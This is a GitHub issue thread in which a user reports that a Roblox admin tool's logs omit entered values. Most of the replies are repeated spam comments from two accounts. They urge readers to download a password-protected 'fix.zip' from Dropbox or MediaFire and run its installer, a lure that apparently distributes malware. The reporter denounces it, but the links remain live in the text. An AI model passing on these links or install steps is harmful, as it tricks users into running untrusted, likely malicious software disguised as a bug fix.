### ISSUE TITLE
Logs is not showing values

### ISSUE THREAD

**Issue by TheHackerLxr** [kohls-admin/main#17]
![Roblox VR Screenshot 2024 08 26 - 05 17 21 65](https://github.com/user-attachments/assets/301f2f81-de65-441b-9394-a1ba36e81d0f)
I noticed that the logs do not display the values (numbers) that the player entered. For example, what speed he gave himself, etc. Thanks for fixing it!

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TheHackerLxr** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Im not stupid stop spreading viruses dumbo

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by south-sound** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
